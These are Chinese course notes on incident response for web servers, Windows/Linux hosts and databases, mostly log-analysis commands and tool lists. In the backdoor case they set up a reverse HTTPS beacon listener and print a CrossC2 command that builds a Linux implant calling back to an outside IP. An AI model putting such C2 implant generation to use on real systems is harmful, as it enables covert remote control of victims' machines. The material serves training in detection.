小迪渗透应急响应(拾)
文章目录
- 73. WEB分析php&javaweb自动化工具(73-75)
- 应急响应:
- 必备知识点:
- 准备工作:
- 有明确信息网站被入侵:
- 无明确信息网站被入侵:
- 常见分析方法:
- 演示案例:
- 涉及资源
- 74. win&linux分析后门&勒索病毒攻击(信息资源-重要)
- 操作系统(windows,linux)应急响应:
- 常见日志类别及存储
- 病毒分析
- 病毒查杀
- 病毒动态
- 在线病毒扫描网站
- 演示案例:
- 涉及资源:
- 75. 数据库&漏洞口令检索&应急取证箱
- 必须知识点:
- 演示案例:
- 涉及资源:
视频资源
73. WEB分析php&javaweb自动化工具(73-75)
应急响应:
保护阶段,分析阶段,复现阶段,修复阶段,建议阶段
目的:分析出攻击时间,攻击操作,攻击后果,安全修复等并给出合理解决方案。
必备知识点:
1.熟悉常见的 WEB 安全攻击技术
2.熟悉相关日志启用及存储查看等
3.熟悉日志中记录数据分类及分析等
准备工作:
1.收集目标服务器各类信息
2.部署相关分析软件及平台等
3.整理相关安全渗透工具指纹库
4.针对异常表现第一时间触发思路
从表现预估入侵面及权限面进行排查
有明确信息网站被入侵:
基于时间 基于操作 基于指纹 基于其他
无明确信息网站被入侵:
1.WEB 漏洞-检查源码类别及漏洞情况
2.中间件漏洞-检查对应版本及漏洞情况
3.第三方应用漏洞-检查是否存在漏洞应用
4.操作系统层面漏洞-检查是否存在系统漏洞
5.其他安全问题(口令,后门等)-检查相关应用口令及后门扫描
常见分析方法:
指纹库搜索,日志时间分析,后门追查分析,漏洞检查分析等
演示案例:
Windows+IIS+Sql-日志,搜索
Linux+BT_Nginx+tp5-日志,后门
Linux+Javaweb+st2-日志,后门,时间
360 星图日志自动分析工具-演示,展望
涉及资源
https://www.cnblogs.com/xiaozi/p/13198071.html 10款日志分析工具
https://www.cnblogs.com/xiaozi/p/12679777.html
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取码:: xiao
74. win&linux分析后门&勒索病毒攻击(信息资源-重要)
操作系统(windows,linux)应急响应:
1.常见危害:暴力破解,漏洞利用,流量攻击,木马控制(Webshell,PC 木马等),病毒感染(挖矿,蠕虫,勒索等)。
2.常见分析:计算机账户,端口,进程,网络,启动,服务,任务,文件等安全问题
常见日志类别及存储
补充资料
Windows,Linux
https://xz.aliyun.com/t/485
https://www.secpulse.com/archives/114019.html
https://docs.microsoft.com/en-us/sysinternals/
病毒分析
PCHunter:http://www.xuetr.com
火绒剑:https://www.huorong.cn
Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker:https://processhacker.sourceforge.io/downloads.php
autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL:https://www.bleepingcomputer.com/download/otl/
SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector
病毒查杀
卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
大蜘蛛:http://free.drweb.ru/download+cureit+free
火绒安全软件:https://www.huorong.cn
360 杀毒:http://sd.360.cn/download_center.html
病毒动态
CVERC-国家计算机病毒应急处理中心:http://www.cverc.org.cn
微步在线威胁情报社区:https://x.threatbook.cn
火绒安全论坛:http://bbs.huorong.cn/forum-59-1.html
爱毒霸社区:http://bbs.duba.net
腾讯电脑管家:http://bbs.guanjia.qq.com/forum-2-1.html
在线病毒扫描网站
http://www.virscan.org //多引擎在线病毒扫描网
https://habo.qq.com //腾讯哈勃分析系统
https://virusscan.jotti.org //Jotti 恶意软件扫描系统
http://www.scanvir.com //计算机病毒、手机病毒、可疑文件分析
演示案例:
攻击响应-暴力破解(RDP,SSH)-Win,Linux
控制响应-后门木马(Webshell,PC)-Win,Linux
危害响应-病毒感染(勒索 WannaCry)-Windows
自动化响应检测-Gscan 多重功能脚本测试-Linux
案例 1-攻击响应-暴力破解(RDP,SSH)-Win,Linux
Windows-LogFusion 载入查看:
事件归类,事件 ID,事件状态等,参考百度资料Linux-grep 筛选:
1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c2、输出登录爆破的第一行和最后一行,确认爆破时间范围:
grep "Failed password" /var/log/secure|head -1
grep "Failed password" /var/log/secure|tail -13、进一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c | sort -nr4、爆破用户名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr5、登录成功的日期、用户名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
案例 2-控制响应-后门木马(Webshell,PC)-Win,Linux
windows:默认配置测试
linux 借助 CrossC2 项目:netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
参考过程:http://www.adminxe.com/1287.html1.项目上传至服务端目录,给予执行权限2.配置监听器:
windows/beacon_https/reverse_https 阿里云记得端口放行3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通过网络监听工具及 windows 日志分析或执行记录查找后门问题
案例 3-危害响应-病毒感染(勒索 WannaCry)-Windows
详细说明中毒表现及恢复指南
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
案例 4-自动化响应检测-Gscan 多重功能脚本测试-Linux
https://github.com/darkr4y/geacon/
涉及资源:
https://xz.aliyun.com/t/485
https://lesuobingdu.360.cn/
https://github.com/gloxec/CrossC2/
https://github.com/darkr4y/geacon/
https://github.com/grayddq/GScan/
https://bbs.pediy.com/thread-217586-1.htm
https://www.nomoreransom.org/zh/index.html
https://docs.microsoft.com/en-us/sysinternals/
https://www.secpulse.com/archives/114019.html
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取码:xiao
75. 数据库&漏洞口令检索&应急取证箱
必须知识点:
1.第三方应用由于是选择性安装,如何做好信息收集和漏洞探针也是获取攻击者思路的重要操作,除去本身漏洞外,提前预知或口令相关攻击也要进行筛选。
2.排除三方应用攻击行为,自查漏洞分析攻击者思路,人工配合工具脚本
3.由于工具或脚本更新迭代快,分类复杂,打造自己的工具箱迫在眉睫
演示案例:
系统日志-Win 日志自动神器 LogonTracer-外网内网日志
应用分析-数据库 Mysql&Mssql&Oracle 等分析-爆破注入操作
模拟测试-自查漏洞模拟渗透测试寻找攻击源头-漏洞口令检索
专业要求-自动化 ir-rescue 应急响应取证工具箱-实时为您提供服务
案例 1-Win 日志自动神器 LogonTracer-外网内网
如何安装使用:https://github.com/JPCERTCC/LogonTracer/wiki/linux 安装使用笔记:阿里云主机记得开放端口及关闭防火墙
1.下载并解压 neo4j:tar -zvxf neo4j-community-4.2.1-unix.tar2.安装 java11 环境:sudo yum install java-11-openjdk -y3.修改 neo4j 配置保证外部访问:
dbms.connector.bolt.listen_address=0.0.0.0:7687
dbms.connector.http.listen_address=0.0.0.0:7474
./bin/neo4j console &4.下载 LogonTracer 并安装库:
git clone https://github.com/JPCERTCC/LogonTracer.git
pip3 install -r requirements.txt5.启动 LogonTracer 并导入日志文件分析
python3 logontracer.py -r -o [PORT] -u [USERNAME] -p [PASSWORD] -s [IP 地址]
python3 logontracer.py -r -o 8080 -u neo4j -p xiaodi -s 47.98.99.126
python3 logontracer.py -e [EVTX 文件] -z [时区] -u [用户名] -p [密码] -s [IP 地址]
python3 logontracer.py -e Security.evtx -z -13 -u neo4j -p xiaodi -s 127.0.0.16.刷新访问 LogonTracer-web_gui 查看分析结果
案例 2-数据库 Mysql&Mssql&Oracle 等日志分析-爆破注入操作
常见的数据库攻击包括弱口令、SQL 注入、提升权限、窃取备份等。对数据库日志进行分析,可以发现攻击行为,进一步还原攻击场景及追溯攻击源。
Mysql:启用,记录,分析(分析 SQL 注入及口令登录爆破等)
show variables like '%general%';
SET GLOBAL general_log = 'On';
SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';
Mssql:查看,跟踪,分析(配置跟踪可分析操作,查看日志可分析登录等)
案例 3-自查漏洞模拟渗透测试寻找攻击源头-漏洞口令检索
1.日志被删除或没价值信息
2.没有思路进行分析可以采用模拟渗透1.windows,linux 系统漏洞自查:
WindowsVulnScan,linux-exploit-suggester
D:\Myproject\venv\Scripts\python.exe cve-check.py -C -f KB.json
./linux-exploit-suggester.sh2.windows,linux 服务漏洞自查:
windows:Get-WmiObject -class Win32_Product
linux:LinEnum.sh
searchsploit weblogic
利用前期信息收集配合 searchsploit 进行应用服务协议等漏洞检索3.windows,linux 协议弱口令自查-工具探针或人工获取判断-snetcraker
案例 4-自动化 ir-rescue 应急响应工具箱-实时为您提供服务
https://github.com/diogo-fernan/ir-rescue
分析脚本工具原理,尝试自己进行编写修改,成为自己的工具箱杀器
涉及资源:
https://github.com/rebootuser/LinEnum
https://github.com/diogo-fernan/ir-rescue
https://github.com/offensive-security/exploitdb
https://github.com/chroblert/WindowsVulnScan
https://github.com/JPCERTCC/LogonTracer.git
https://github.com/mzet-/linux-exploit-suggester
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取码:xiao
小迪渗透应急响应(拾)相关推荐
- 2022-10-15(Linux应急响应、配置漏洞之DNS域传送、内网渗透之内网主机发现技巧)
http://noahblog.360.cn/advanced-windows-taskscheduler-playbook/@[toc] [重要]拜读的文章链接都在标题上. 一.linux应急响应 ...
- 从后渗透分析应急响应的那些事儿(二)免杀初识篇
从后渗透分析应急响应的那些事儿(二)免杀初识篇 文章首发于freebuf Tidesec专栏 https://www.freebuf.com/column/204005.html,转载到个人博客记录, ...
- 应急响应“小迪安全课堂笔记”web,系统,数据库三方应用
应急响应 应急响应初识 WEB 攻击应急响应朔源-后门,日志 WIN 系统攻击应急响应朔源-后门,日志,流量 应急响应-WEB 分析 php&javaweb&自动化工具 应急响应流程 ...
- 常见安全服务(基线加固、风险评估、应急响应、渗透测试、代码审计、重保)介绍
常见安全服务(基线加固.风险评估.应急响应.渗透测试.代码审计.重保)介绍 前言 一.安全服务的意义 二.常见安全服务 1.基线加固 2.风险评估 3.渗透测试 4.应急演练/应急响应 5.代码审计 ...
- 小迪渗透python开发(拾壹)
文章目录 76. 内网收集Scoket&子域名&DNS(76-79) 应急响应补充知识点 Python 开发相关知识点: 知识点: 演示案例: 涉及资源: 77. 批量Fofa& ...
- 最实用的应急响应笔记思路小结
0x00 事件应急响应的流程分析 事件整个类型大致归类于: 事件表现-信息收集-确认攻击类型-事件追查-修复 1)事件的表现: 网站类型:被篡改,信息丢失,乱码等 文件类型:被篡改,丢失,泄露等 系统 ...
- 应急响应 Windows和Linux操作系统(查杀 后门木马,处理 勒索病毒.)
网络安全--应急响应 应急响应"对应的英文是"Incident Response"或"Emergency Response"等,通常是指一个组织为了应 ...
- Linux安全事件应急响应排查方法总结
Linux安全事件应急响应排查方法总结 Linux是服务器操作系统中最常用的操作系统,因为其拥有高性能.高扩展性.高安全性,受到了越来越多的运维人员追捧.但是针对Linux服务器操作系统的安全事件也非 ...
- 如何做好应急响应工作?常见应急响应流程
一.前言 这是博主对于应急响应归纳出来的方法论,一个笼统的.抽象的概念,包含思路和方法. 二.常见应急响应流程 这是博主自己的经验总结出来的应急响应流程,也是亲自去应急时的流程. 三.响应 这里不讨论 ...
最新文章
- 用iptables做IP的静态映射
- 数据结构和算法分析: 红黑树
- GDCM:gdcm::LTComp的测试程序
- 方立勋_30天掌握JavaWeb_Servlet
- linux 下 安装 phpstorm
- 【Hibernate框架开发之七】Annotation各种关系CRUD增删改查集合映射继承映射
- SharePoint 2013技巧分享系列 - 隐藏Blog和Apps左侧导航菜单
- 「Java工具类」Apache的FileUtils和IOUtils工具类
- FrameMaker 格式的本地化流程
- 简单暴力的排序方式:直接排序
- 转载(中文、日文、韩文编码问题)
- 329 矩阵中的最长递增路径
- 免费开源ETL工具KETTLE
- linux文件目录基本操作实验结论,实验 Linux文件和目录操作
- STM32系列 STM32F4xx SPI Flash-读写操作
- mysql 中的pri_关于MySQL中 主键 pri mul
- idea import顺序_idea导入项目【操作方法】
- linux下的文件属性和文件权限
- ASP无限级分类代码
- 自动空调是嵌入计算机,汽车自动空调基本结构及原理